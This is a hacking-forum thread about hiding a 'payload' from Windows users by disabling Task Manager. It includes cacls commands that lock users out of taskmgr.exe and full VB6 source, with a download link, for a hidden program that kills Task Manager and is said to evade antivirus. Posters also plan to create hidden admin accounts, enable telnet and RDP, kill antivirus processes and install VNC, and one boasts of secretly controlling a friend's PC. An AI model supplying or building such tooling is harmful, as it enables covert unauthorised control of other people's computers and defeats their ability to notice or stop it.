Jump to content

Disabling Ctrl+Alt+Del/Taskmgr


G-Stress
 Share

Recommended Posts

True, but I didn't use the registry. That was the supposedly simplest way of disabling it, but the so called registry entries weren't even in my registry and I didn't try to create them. I used cacls to disable it from the current logged on user. Trying to figure out now how to disable it for only maybe 30 seconds or so.

Link to comment
Share on other sites

rename taskmgr.exe

Like Explorer.exe, it will put a new copy out there(or at least it should) from dll cache files or backups. You have to logged on in safe mode, rename the file in dll cache(that it pulls a backup from) an dthen rename the file. I used this method to update a file so I can make my own themes that wouldn't run under the original uxtheme dll file.

All system files should automatically replace themself, and if they don't you can use somehting like system file checker to get it back.

http://en.wikipedia.org/wiki/System_File_Checker

Link to comment
Share on other sites

Yea I've read about renaming and deleting the file and that it will create a backup upon next reboot or so. I'm just disabling it for about 30 seconds or so. I used:

cacls c:windowssystem32taskmgr.exe /D %COMPUTERNAME%%USERNAME%

which seems to work just fine for now. I just am trying to figure out how to re-enable it again but after 30 seconds exactly.

cacls c:windowssystem32taskmgr.exe /g %COMPUTERNAME%%USERNAME%:r

re-enables it to the current logged on user with read only access which is fine I just want that command to execute exactly 30 seconds after it has been disabled. The only way I can think of is to ping the localhost and try to do it for only 30 seconds somehow.

Link to comment
Share on other sites

also in gpedit.msc

Link to comment
Share on other sites

Depends on the user...i know for one thing my parents would have no idea how to fix it and are too afraid to modify the registry for fear of breaking Windows.

It would be a great little addition you could add for those not-so-experienced Windows users. Renaming the executable would really mess with them too. Can't hurt to add it to the payload, like everything else, you can enable/disable it at your own liking. Personally I think it would be fun. Ya its kind of obvious, but that will just make them wonder who/how that got disabled. I love playing pranks with the hacksaw 8-) Friend of mine reinstalled Windows last week because I VNCed into his comp and started messing with him. He freaked. I'm gonna go disable Ctrl-Alt-Delete on him now...hes not techy enough to figure that one out. hehe...

Link to comment
Share on other sites

Better would be a Task Manager clone that hides your progrms from showing up in it, or making a registry file that points to your version of a Taskmanager.exe on a thumb drive that hides your programs from being seen and then reverts back at the end of your payload to the original Taskmanager on exit. This way they can still use Task Manager to end certain programs but yours never show up in Taskmanager. If I remember correctly, there are some Taskmanager clones on PSC in VB6, so all you need to do is make the GUI look identical to the system your on and your pretty much golden. Make several variants to match the OS, like one for XP, 2000, Server 2003, etc.

They all look similar anyway so some people  might not even notice. And since it's not a virus, it shouldn't set off any alerts, although ZoneAlarm seems to ask to allow EVERY program to run if it is set up properly.

IIt will be defeated if someone checks msinfo32.exe because they can see running tasks in there as well. But then again, you could do the same thing here and make a clone that filters out your running payloads.

Link to comment
Share on other sites

@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea alot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

Link to comment
Share on other sites

@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea alot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

You will have to put hooks in there to check for getting taskmanager from other places to though. Like right clicking the taskbar or "start/run/taskmgr"

Link to comment
Share on other sites

Here is a little vb6 app that when run, hides it off screen and captures the delete key as well as mouse movements, so if they right click the taskbar to start taskmgr or use start/run or even windowskey+R to load a run box and manually run taskmgr, it kills taskmgr from running. Press F12 and it unloads the program, or add another timer and kill the vb6 program after so many minutes.

'End Taskmgr in Windows XP
'12/31/2007 - DigiP
'
'Following Line allows ShellExecute commands
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

'Mouse Detection Src Code: http://www.daniweb.com/forums/thread101100.html
Private Type POINTAPI
    X As Long
    Y As Long
End Type

Private Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long


Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)

On Error GoTo poo
If KeyCode = vbKeyDelete Then 'Because we only want to check if delete is pressed in combo with ctrl+alt+del
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
End If

MakeTopMost (Me.hWnd)

'Change this to whatever you want!
If KeyCode = vbKeyF12 Then Unload Me

Exit Sub


poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub



Private Sub Timer1_Timer()
Dim Point As POINTAPI
Dim lngReturn As Long
Dim lngScreenX As Long
Dim lngScreenY As Long
lngReturn = GetCursorPos(Point)
lngScreenX = Point.X
lngScreenY = Point.Y
' Enter Code to whatever you want with the results
'
'Debug.Print "X-pos: " & lngScreenX & " , Y-pos: " & lngScreenY

On Error GoTo poo
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
MakeTopMost (Me.hWnd)
Exit Sub

poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub

Create a form and add timer to it (Set the interval to like 2000 which is 2 seconds or 1000 for 1 second). Then resize the form to like 10x10 pixels and make its start up position off screen. Done.

Full source project download as well as working EXE file: http://www.twistedpairrecords.com/digip/ctrled.rar

And BTW, virus scanners do not detect it since it really isnt malicious code, just built in Windows functions. Will not work on anything older than xp since taskmgr is not a program on 98 or 95 and taskkill is an XP system program.

This can still be detected and defeted by opening cmd.exe and typing in tasklist to see whats running. Then killing it with:

taskkill /F /IM ctrled.exe

I leave it up to you if you also want to kill cmd.exe or command.com, but leave yourself a way to end it safely or it will run forever until you reboot.

Link to comment
Share on other sites

@ digip,

Nice one. I'll have to play around with that. Hmmm... how bout not kill cmd, but really restrict it to limited usage... actually... I wonder if there is a app cmd-like that when a user runs cmd or command.com those commands are mapped to a custom "shell" a fake shell something that would not allow the user to run admin commands, but appear as normal shell... I got quite a few idea's in mind I would like to create something not so much as to do damage, but to really make a user think.

@ Sc0rpi0,

Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...